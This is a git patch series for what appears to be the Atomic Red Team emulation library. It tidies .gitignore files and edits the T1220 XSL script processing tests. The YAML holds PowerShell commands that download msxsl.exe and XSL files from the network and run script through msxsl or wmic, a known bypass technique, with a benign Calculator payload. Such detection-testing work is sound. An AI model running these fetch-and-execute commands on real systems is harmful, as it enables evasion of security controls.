From 3ce7e7909aa3c39520a33a3906ef49d43aa4934a Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:23 -0400 Subject: [PATCH 1/6] Create .gitignore --- atomics/T1220/bin./.gitignore | 52 +++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 atomics/T1220/bin./.gitignore diff --git a/atomics/T1220/bin./.gitignore b/atomics/T1220/bin./.gitignore new file mode 100644 index 00000000..c6127b38 --- /dev/null +++ b/atomics/T1220/bin./.gitignore @@ -0,0 +1,52 @@ +# Prerequisites +*.d + +# Object files +*.o +*.ko +*.obj +*.elf + +# Linker output +*.ilk +*.map +*.exp + +# Precompiled Headers +*.gch +*.pch + +# Libraries +*.lib +*.a +*.la +*.lo + +# Shared objects (inc. Windows DLLs) +*.dll +*.so +*.so.* +*.dylib + +# Executables +*.exe +*.out +*.app +*.i*86 +*.x86_64 +*.hex + +# Debug files +*.dSYM/ +*.su +*.idb +*.pdb + +# Kernel Module Compile Results +*.mod* +*.cmd +.tmp_versions/ +modules.order +Module.symvers +Mkfile.old +dkms.conf From fadc563c96d8e738d3b05e963c18c7a5de414e73 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:42 -0400 Subject: [PATCH 2/6] Delete atomics/T1220/bin. directory --- atomics/T1220/bin./.gitignore | 52 ----------------------------------- 1 file changed, 52 deletions(-) delete mode 100644 atomics/T1220/bin./.gitignore diff --git a/atomics/T1220/bin./.gitignore b/atomics/T1220/bin./.gitignore deleted file mode 100644 index c6127b38..00000000 --- a/atomics/T1220/bin./.gitignore +++ /dev/null @@ -1,52 +0,0 @@ -# Prerequisites -*.d - -# Object files -*.o -*.ko -*.obj -*.elf - -# Linker output -*.ilk -*.map -*.exp - -# Precompiled Headers -*.gch -*.pch - -# Libraries -*.lib -*.a -*.la -*.lo - -# Shared objects (inc. Windows DLLs) -*.dll -*.so -*.so.* -*.dylib - -# Executables -*.exe -*.out -*.app -*.i*86 -*.x86_64 -*.hex - -# Debug files -*.dSYM/ -*.su -*.idb -*.pdb - -# Kernel Module Compile Results -*.mod* -*.cmd -.tmp_versions/ -modules.order -Module.symvers -Mkfile.old -dkms.conf From 6c4af49f595e9d1c50dfd4fabc5d0b4bbd33d378 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:57 -0400 Subject: [PATCH 3/6] Create .gitignore --- atomics/T1220/bin/.gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 atomics/T1220/bin/.gitignore diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore new file mode 100644 index 00000000..be9bd124 --- /dev/null +++ b/atomics/T1220/bin/.gitignore @@ -0,0 +1 @@ +ignore From 2ae946496adab853988cca3561564777fb0eaf36 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:53:02 -0400 Subject: [PATCH 4/6] Delete .gitignore --- atomics/T1220/bin/.gitignore | 1 - 1 file changed, 1 deletion(-) delete mode 100644 atomics/T1220/bin/.gitignore diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore deleted file mode 100644 index be9bd124..00000000 --- a/atomics/T1220/bin/.gitignore +++ /dev/null @@ -1 +0,0 @@ -ignore From acd76a17a31f235533348167a9a6971525cc62b4 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:54:25 -0400 Subject: [PATCH 5/6] Create .gitignore gitignore for /bin/ folder --- atomics/T1220/bin/.gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 atomics/T1220/bin/.gitignore diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/atomics/T1220/bin/.gitignore @@ -0,0 +1 @@ + From decc37d1dce19e4b5899a65ca52db005ffb4bda6 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 18:18:18 -0400 Subject: [PATCH 6/6] Fix for MSXSL dependency issues Added: Fixes for "MSXSL Bypass using remote files" T1220/bin/ folder for default msxsl.exe filepath. Input argument for filepath to msxls.exe Cleanup command to remove msxls.exe Capitalization fixes for "-ErrorAction Ignore" Fixed spelling "successfully" on line 10, 60, and 121. Split line 57 to get length under 150 characters. --- atomics/T1220/T1220.yaml | 46 +++++++++++++++++++++++++++++----------- 1 file changed, 34 insertions(+), 12 deletions(-) diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 03936bd3..1656a3a4 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -5,8 +5,9 @@ atomic_tests: auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d description: | Executes the code specified within a XSL script tag during XSL transformation using a local payload. - Requires download of MSXSL from Microsoft (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ). - Open Calculator.exe when test sucessfully executed, while AV turned off. + Requires download of MSXSL. No longer available from Microsoft. + (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) + Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: @@ -18,6 +19,10 @@ atomic_tests: description: Location of the test XSL script file on the local filesystem. type: Path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl + msxsl_exe: + description: Location of the MSXSL executable. + type: Path + default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: - description: | @@ -25,31 +30,34 @@ atomic_tests: prereq_command: | if (Test-Path #{xmlfile}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: | XSL file must exist on disk at specified location (#{xslfile}) prereq_command: | if (Test-Path #{xslfile}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: | msxsl.exe must exist on disk at specified location (#{msxsl_exe}) prereq_command: | if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "$env:TEMP\msxsl.exe" - Copy-Item $env:TEMP\msxsl.exe #{msxsl_exe} -Force - Remove-Item $env:TEMP\msxsl.exe + Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | - C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + #{msxsl_exe} #{xmlfile} #{xslfile} + cleanup_command: | + Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 description: | - Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + Executes the code specified within a XSL script tag during XSL transformation using a remote payload. + Requires download of MSXSL.exe. No longer available from Microsoft. + (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) + Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: @@ -61,9 +69,23 @@ atomic_tests: description: Remote location (URL) of the test XSL script file. type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl + msxsl_exe: + description: Location of the MSXSL executable. + type: Path + default: PathToAtomicsFolder\T1220\bin\msxsl.exe + dependency_executor_name: powershell + dependencies: + - description: | + msxsl.exe must exist on disk at specified location (#{msxsl_exe}) + prereq_command: | + if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | - C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + #{msxsl_exe} #{xmlfile} #{xslfile} + cleanup_command: | + Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 @@ -87,7 +109,7 @@ atomic_tests: prereq_command: | if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: | @@ -96,7 +118,7 @@ atomic_tests: - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b description: | - Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. + Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: